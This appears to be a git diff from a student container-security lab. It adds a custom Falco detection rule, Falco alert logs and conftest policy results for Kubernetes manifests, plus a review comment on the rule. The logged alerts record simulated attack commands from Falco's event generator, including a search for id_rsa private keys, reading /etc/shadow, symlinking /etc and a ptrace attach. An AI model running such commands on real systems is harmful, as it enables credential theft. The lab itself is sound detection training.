exe_flags=EXE_WRITABLE|EXE_LOWER_LAYER container_id=620ecad49db3 container_name=eventgen container_image_repository=falcosecurity/event-generator container_image_tag=latest k8s_pod_name= k8s_ns_name=","output_fields":{"container.id":"620ecad49db3","container.image.repository":"falcosecurity/event-generator","container.image.tag":"latest","container.name":"eventgen","evt.arg.flags":"EXE_WRITABLE|EXE_LOWER_LAYER","evt.time.iso8601":1778604781074549022,"evt.type":"execve","k8s.ns.name":null,"k8s.pod.name":null,"proc.cmdline":"find /tmp -maxdepth 1 -iname id_rsa","proc.exepath":"/bin/busybox","proc.name":"find","proc.pname":"event-generator","proc.tty":0,"user.loginuid":-1,"user.name":"root","user.uid":0},"priority":"Warning","rule":"Search Private Keys or Passwords","source":"syscall","tags":["T1552.001","container","filesystem","host","maturity_stable","mitre_credential_access","process"],"time":"2026-05-12T16:53:01.074549022Z"} 
+{"hostname":"571ea5bf0330","output":"2026-05-12T16:53:01.175331075+0000: Warning Symlinks created over sensitive files | target=/etc linkpath=/tmp/falco-event-generator-syscall-CreateSymlinkOverSensitiveFiles-2948800653/etc_link evt_type=symlink user=root user_uid=0 user_loginuid=-1 process=ln proc_exepath=/bin/busybox parent=event-generator command=ln -s /etc /tmp/falco-event-generator-syscall-CreateSymlinkOverSensitiveFiles-2948800653/etc_link terminal=0 container_id=620ecad49db3 container_name=eventgen container_image_repository=falcosecurity/event-generator container_image_tag=latest k8s_pod_name= k8s_ns_name=","output_fields":{"container.id":"620ecad49db3","container.image.repository":"falcosecurity/event-generator","container.image.tag":"latest","container.name":"eventgen","evt.arg.linkpath":"/tmp/falco-event-generator-syscall-CreateSymlinkOverSensitiveFiles-2948800653/etc_link","evt.arg.target":"/etc","evt.time.iso8601":1778604781175331075,"evt.type":"symlink","k8s.ns.name":null,"k8s.pod.name":null,"proc.cmdline":"ln -s /etc /tmp/falco-event-generator-syscall-CreateSymlinkOverSensitiveFiles-2948800653/etc_link","proc.exepath":"/bin/busybox","proc.name":"ln","proc.pname":"event-generator","proc.tty":0,"user.loginuid":-1,"user.name":"root","user.uid":0},"priority":"Warning","rule":"Create Symlink Over Sensitive Files","source":"syscall","tags":["T1555","container","filesystem","host","maturity_stable","mitre_credential_access"],"time":"2026-05-12T16:53:01.175331075Z"} +{"hostname":"571ea5bf0330","output":"2026-05-12T16:53:01.276350715+0000: Critical Executing binary not part of base image | proc_exe=/bin/falco-event-generator-syscall-DropAndExecuteNewBinaryInContainer-kdMYL1 proc_sname=event-generator gparent=containerd-shim proc_exe_ino_ctime=1778604781275513731 proc_exe_ino_mtime=2961927245519455107 proc_exe_ino_ctime_duration_proc_start=740856 proc_cwd=/ container_start_ts=1778604777834119987 evt_type=execve user=root user_uid=0 user_loginuid=-1 
process=falco-event-gen proc_exepath=/bin/falco-event-generator-syscall-DropAndExecuteNewBinaryInContainer-kdMYL1 parent=event-generator command=falco-event-gen terminal=0 exe_flags=EXE_WRITABLE|EXE_UPPER_LAYER container_id=620ecad49db3 container_name=eventgen container_image_repository=falcosecurity/event-generator container_image_tag=latest k8s_pod_name= k8s_ns_name=","output_fields":{"container.id":"620ecad49db3","container.image.repository":"falcosecurity/event-generator","container.image.tag":"latest","container.name":"eventgen","container.start_ts":1778604777834119987,"evt.arg.flags":"EXE_WRITABLE|EXE_UPPER_LAYER","evt.time.iso8601":1778604781276350715,"evt.type":"execve","k8s.ns.name":null,"k8s.pod.name":null,"proc.aname[2]":"containerd-shim","proc.cmdline":"falco-event-gen","proc.cwd":"/","proc.exe":"/bin/falco-event-generator-syscall-DropAndExecuteNewBinaryInContainer-kdMYL1","proc.exe_ino.ctime":1778604781275513731,"proc.exe_ino.ctime_duration_proc_start":740856,"proc.exe_ino.mtime":2961927245519455107,"proc.exepath":"/bin/falco-event-generator-syscall-DropAndExecuteNewBinaryInContainer-kdMYL1","proc.name":"falco-event-gen","proc.pname":"event-generator","proc.sname":"event-generator","proc.tty":0,"user.loginuid":-1,"user.name":"root","user.uid":0},"priority":"Critical","rule":"Drop and execute new binary in container","source":"syscall","tags":["PCI_DSS_11.5.1","TA0003","container","maturity_stable","mitre_persistence","process"],"time":"2026-05-12T16:53:01.276350715Z"} +{"hostname":"571ea5bf0330","output":"2026-05-12T16:53:07.387789485+0000: Warning Sensitive file opened for reading by trusted program after startup | file=/etc/shadow pcmdline=event-generator run syscall gparent=containerd-shim ggparent=systemd gggparent= evt_type=openat user=root user_uid=0 user_loginuid=-1 process=httpd proc_exepath=/bin/event-generator parent=event-generator command=httpd --loglevel info run ^syscall.ReadSensitiveFileUntrusted$ --sleep 6s terminal=0 
container_id=620ecad49db3 container_name=eventgen container_image_repository=falcosecurity/event-generator container_image_tag=latest k8s_pod_name= k8s_ns_name=","output_fields":{"container.id":"620ecad49db3","container.image.repository":"falcosecurity/event-generator","container.image.tag":"latest","container.name":"eventgen","evt.time.iso8601":1778604787387789485,"evt.type":"openat","fd.name":"/etc/shadow","k8s.ns.name":null,"k8s.pod.name":null,"proc.aname[2]":"containerd-shim","proc.aname[3]":"systemd","proc.aname[4]":null,"proc.cmdline":"httpd --loglevel info run ^syscall.ReadSensitiveFileUntrusted$ --sleep 6s","proc.exepath":"/bin/event-generator","proc.name":"httpd","proc.pcmdline":"event-generator run syscall","proc.pname":"event-generator","proc.tty":0,"user.loginuid":-1,"user.name":"root","user.uid":0},"priority":"Warning","rule":"Read sensitive file trusted after startup","source":"syscall","tags":["T1555","container","filesystem","host","maturity_stable","mitre_credential_access"],"time":"2026-05-12T16:53:07.387789485Z"} +{"hostname":"571ea5bf0330","output":"2026-05-12T16:53:07.488990643+0000: Warning Detected ptrace PTRACE_ATTACH attempt | proc_pcmdline=containerd-shim -namespace moby -id 620ecad49db3a3a03d9db9a31c2c70224002d76b79457001b703639877e950f9 -address /run/containerd/containerd.sock evt_type=ptrace user=root user_uid=0 user_loginuid=-1 process=event-generator proc_exepath=/bin/event-generator parent=containerd-shim command=event-generator run syscall terminal=0 container_id=620ecad49db3 container_name=eventgen container_image_repository=falcosecurity/event-generator container_image_tag=latest k8s_pod_name= k8s_ns_name=","output_fields":{"container.id":"620ecad49db3","container.image.repository":"falcosecurity/event-generator","container.image.tag":"latest","container.name":"eventgen","evt.time.iso8601":1778604787488990643,"evt.type":"ptrace","k8s.ns.name":null,"k8s.pod.name":null,"proc.cmdline":"event-generator run 
syscall","proc.exepath":"/bin/event-generator","proc.name":"event-generator","proc.pcmdline":"containerd-shim -namespace moby -id 620ecad49db3a3a03d9db9a31c2c70224002d76b79457001b703639877e950f9 -address /run/containerd/containerd.sock","proc.pname":"containerd-shim","proc.tty":0,"user.loginuid":-1,"user.name":"root","user.uid":0},"priority":"Warning","rule":"PTRACE attached to process","source":"syscall","tags":["T1055.008","container","host","maturity_stable","mitre_privilege_escalation","process"],"time":"2026-05-12T16:53:07.488990643Z"} +{"hostname":"571ea5bf0330","output":"2026-05-12T17:01:04.341228872+0000: Warning Falco Custom: File write in /usr/local/bin (container=lab9-helper user=root file=/usr/local/bin/testdir/test.txt flags=O_LARGEFILE|O_TRUNC|O_CREAT|O_WRONLY|O_F_CREATED|FD_UPPER_LAYER) container_id=41575d6baa96 container_name=lab9-helper container_image_repository=alpine container_image_tag=3.19 k8s_pod_name= k8s_ns_name=","output_fields":{"container.id":"41575d6baa96","container.image.repository":"alpine","container.image.tag":"3.19","container.name":"lab9-helper","evt.arg.flags":"O_LARGEFILE|O_TRUNC|O_CREAT|O_WRONLY|O_F_CREATED|FD_UPPER_LAYER","evt.time.iso8601":1778605264341228872,"fd.name":"/usr/local/bin/testdir/test.txt","k8s.ns.name":null,"k8s.pod.name":null,"user.name":"root"},"priority":"Warning","rule":"Write Binary Under UsrLocalBin","source":"syscall","tags":["compliance","container","drift"],"time":"2026-05-12T17:01:04.341228872Z"} diff --git a/labs/lab9/falco/rules/custom-rules.yaml b/labs/lab9/falco/rules/custom-rules.yaml new file mode 100644 index 00000000..03a44460 --- /dev/null +++ b/labs/lab9/falco/rules/custom-rules.yaml 
@@ -0,0 +1,11 @@
+# Detect new writable file under /usr/local/bin inside any container
+- rule: Write Binary Under UsrLocalBin
+ desc: Detects writes under /usr/local/bin inside any container
+ condition: evt.type in (open, openat, openat2, creat) and
+ evt.is_open_write=true and
+ fd.name startswith /usr/local/bin/ and
+ container.id != host
+ output: >
+ Falco Custom: File write in /usr/local/bin (container=%container.name user=%user.name file=%fd.name flags=%evt.arg.flags)
+ priority: WARNING
+ tags: [container, compliance, drift]
\ No newline at end of file
diff --git a/labs/submission9.md b/labs/submission9.md
new file mode 100644
index 00000000..ec668142
--- /dev/null
+++ b/labs/submission9.md
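Review bot: The `condition:` lines match any write under /usr/local/bin/ (the submission's own test shows it firing on `custom-rule.txt` and `testdir/test.txt`), while the rule name and the header comment promise detection of new binaries; either rename the rule or state in `desc` that any file type under the directory counts. The condition also lacks the `fd.typechar='f' and fd.num>=0` guard that Falco's stock `open_write` macro carries, so it presumably fires on opens that were denied (for example by a read-only root filesystem) as well as on successful writes; if alerting on attempts is intended, document that in `desc`, otherwise tighten it to `evt.is_open_write=true and fd.typechar='f' and fd.num>=0 and fd.name startswith /usr/local/bin/ and container.id != host`. Separately, `%evt.arg.flags` in `output` has no counterpart on a `creat` event, so that field will likely render as `<NA>` for the creat case; consider noting this in a comment or dropping `creat` from the type list if the flags are needed.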
@@ -0,0 +1,69 @@ +# Task 1 + +## Observations + + +Single understandable output and most interesting one: +``` +[rightrat | ~/c/DevSecOps-Intro] docker exec --user 0 lab9-helper /bin/sh -lc 'echo custom-test > /usr/local/bin/custom-rule.txt' +Events detected: 0 +Rule counts by severity: +Events detected: 0 +Rule counts by severity: +Triggered rules by rule name: +{"hostname":"571ea5bf0330","output":"2026-05-12T16:52:34.229939671+0000: Warning Falco Custom: File write in /usr/local/bin (container=lab9-helper user=root file=/usr/local/bin/custom-rule.txt flags=O_LARGEFILE|O_TRUNC|O_CREAT|O_WRONLY|O_F_CREATED|FD_UPPER_LAYER) container_id=41575d6baa96 container_name=lab9-helper container_image_repository=alpine container_image_tag=3.19 k8s_pod_name= k8s_ns_name=","output_fields":{"container.id":"41575d6baa96","container.image.repository":"alpine","container.image.tag":"3.19","container.name":"lab9-helper","evt.arg.flags":"O_LARGEFILE|O_TRUNC|O_CREAT|O_WRONLY|O_F_CREATED|FD_UPPER_LAYER","evt.time.iso8601":1778604754229939671,"fd.name":"/usr/local/bin/custom-rule.txt","k8s.ns.name":null,"k8s.pod.name":null,"user.name":"root"},"priority":"Warning","rule":"Write Binary Under UsrLocalBin","source":"syscall","tags":["compliance","container","drift"],"time":"2026-05-12T16:52:34.229939671Z"} +Triggered rules by rule name: +{"hostname":"571ea5bf0330","output":"2026-05-12T16:52:34.229939671+0000: Warning Falco Custom: File write in /usr/local/bin (container=lab9-helper user=root file=/usr/local/bin/custom-rule.txt flags=O_LARGEFILE|O_TRUNC|O_CREAT|O_WRONLY|O_F_CREATED|FD_UPPER_LAYER) container_id=41575d6baa96 container_name=lab9-helper container_image_repository=alpine container_image_tag=3.19 k8s_pod_name= 
k8s_ns_name=","output_fields":{"container.id":"41575d6baa96","container.image.repository":"alpine","container.image.tag":"3.19","container.name":"lab9-helper","evt.arg.flags":"O_LARGEFILE|O_TRUNC|O_CREAT|O_WRONLY|O_F_CREATED|FD_UPPER_LAYER","evt.time.iso8601":1778604754229939671,"fd.name":"/usr/local/bin/custom-rule.txt","k8s.ns.name":null,"k8s.pod.name":null,"user.name":"root"},"priority":"Warning","rule":"Write Binary Under UsrLocalBin","source":"syscall","tags":["compliance","container","drift"],"time":"2026-05-12T16:52:34.229939671Z"} +``` +This triggered both the innate drift rule and my custom rule +My custom rule triggers on write to /usr/local/bin inside any container. Shouldn't trigger on writes to parental folders and cousin folders + +## Test to find out whether the rule would trigger in subdirectories +```shell +[rightrat | ~/c/DevSecOps-Intro] docker exec --user 0 lab9-helper /bin/sh -lc 'mkdir /usr/local/bin/testdir' +[rightrat | ~/c/DevSecOps-Intro] docker exec --user 0 lab9-helper /bin/sh -lc 'echo blah blah > /usr/local/bin/testdir/test.txt' +{"hostname":"571ea5bf0330","output":"2026-05-12T17:01:04.341228872+0000: Warning Falco Custom: File write in /usr/local/bin (container=lab9-helper user=root file=/usr/local/bin/testdir/test.txt flags=O_LARGEFILE|O_TRUNC|O_CREAT|O_WRONLY|O_F_CREATED|FD_UPPER_LAYER) container_id=41575d6baa96 container_name=lab9-helper container_image_repository=alpine container_image_tag=3.19 k8s_pod_name= k8s_ns_name=","output_fields":{"container.id":"41575d6baa96","container.image.repository":"alpine","container.image.tag":"3.19","container.name":"lab9-helper","evt.arg.flags":"O_LARGEFILE|O_TRUNC|O_CREAT|O_WRONLY|O_F_CREATED|FD_UPPER_LAYER","evt.time.iso8601":1778605264341228872,"fd.name":"/usr/local/bin/testdir/test.txt","k8s.ns.name":null,"k8s.pod.name":null,"user.name":"root"},"priority":"Warning","rule":"Write Binary Under 
UsrLocalBin","source":"syscall","tags":["compliance","container","drift"],"time":"2026-05-12T17:01:04.341228872Z"}
+{"hostname":"571ea5bf0330","output":"2026-05-12T17:01:04.341228872+0000: Warning Falco Custom: File write in /usr/local/bin (container=lab9-helper user=root file=/usr/local/bin/testdir/test.txt flags=O_LARGEFILE|O_TRUNC|O_CREAT|O_WRONLY|O_F_CREATED|FD_UPPER_LAYER) container_id=41575d6baa96 container_name=lab9-helper container_image_repository=alpine container_image_tag=3.19 k8s_pod_name= k8s_ns_name=","output_fields":{"container.id":"41575d6baa96","container.image.repository":"alpine","container.image.tag":"3.19","container.name":"lab9-helper","evt.arg.flags":"O_LARGEFILE|O_TRUNC|O_CREAT|O_WRONLY|O_F_CREATED|FD_UPPER_LAYER","evt.time.iso8601":1778605264341228872,"fd.name":"/usr/local/bin/testdir/test.txt","k8s.ns.name":null,"k8s.pod.name":null,"user.name":"root"},"priority":"Warning","rule":"Write Binary Under UsrLocalBin","source":"syscall","tags":["compliance","container","drift"],"time":"2026-05-12T17:01:04.341228872Z"}
+```
+
+# Task 2
+
+## Unhardened manifest
+```
+[rightrat | ~/c/DevSecOps-Intro] docker run --rm -v "$(pwd)/labs/lab9":/project \
+ openpolicyagent/conftest:latest \
+ test /project/manifests/k8s/juice-unhardened.yaml -p /project/policies --all-namespaces | tee labs/lab9/analysis/conftest-unhardened.txt
+WARN - /project/manifests/k8s/juice-unhardened.yaml - k8s.security - container "juice" should define livenessProbe
+WARN - /project/manifests/k8s/juice-unhardened.yaml - k8s.security - container "juice" should define readinessProbe
+FAIL - /project/manifests/k8s/juice-unhardened.yaml - k8s.security - container "juice" missing resources.limits.cpu
+FAIL - /project/manifests/k8s/juice-unhardened.yaml - k8s.security - container "juice" missing resources.limits.memory
+FAIL - /project/manifests/k8s/juice-unhardened.yaml - k8s.security - container "juice" missing resources.requests.cpu
+FAIL - /project/manifests/k8s/juice-unhardened.yaml - k8s.security - container "juice" missing resources.requests.memory
+FAIL - /project/manifests/k8s/juice-unhardened.yaml - k8s.security - container "juice" must set allowPrivilegeEscalation: false
+FAIL - /project/manifests/k8s/juice-unhardened.yaml - k8s.security - container "juice" must set readOnlyRootFilesystem: true
+FAIL - /project/manifests/k8s/juice-unhardened.yaml - k8s.security - container "juice" must set runAsNonRoot: true
+FAIL - /project/manifests/k8s/juice-unhardened.yaml - k8s.security - container "juice" uses disallowed :latest tag
+
+30 tests, 20 passed, 2 warnings, 8 failures, 0 exceptions
+```
+
+## Hardened manifest
+```
+[rightrat | ~/c/DevSecOps-Intro] docker run --rm -v "$(pwd)/labs/lab9":/project \
+ openpolicyagent/conftest:latest \
+ test /project/manifests/k8s/juice-hardened.yaml -p /project/policies --all-namespaces | tee labs/lab9/analysis/conftest-hardened.txt
+
+
+30 tests, 30 passed, 0 warnings, 0 failures, 0 exceptions
+```
+
+## Docker Compose manifest
+```
+[rightrat | ~/c/DevSecOps-Intro] docker run --rm -v "$(pwd)/labs/lab9":/project \
+ openpolicyagent/conftest:latest \
+ test /project/manifests/compose/juice-compose.yml -p /project/policies --all-namespaces | tee labs/lab9/analysis/conftest-compose.txt
+
+15 tests, 15 passed, 0 warnings, 0 failures, 0 exceptions
+```
+
+Doesn't seem to check for everything
\ No newline at end of file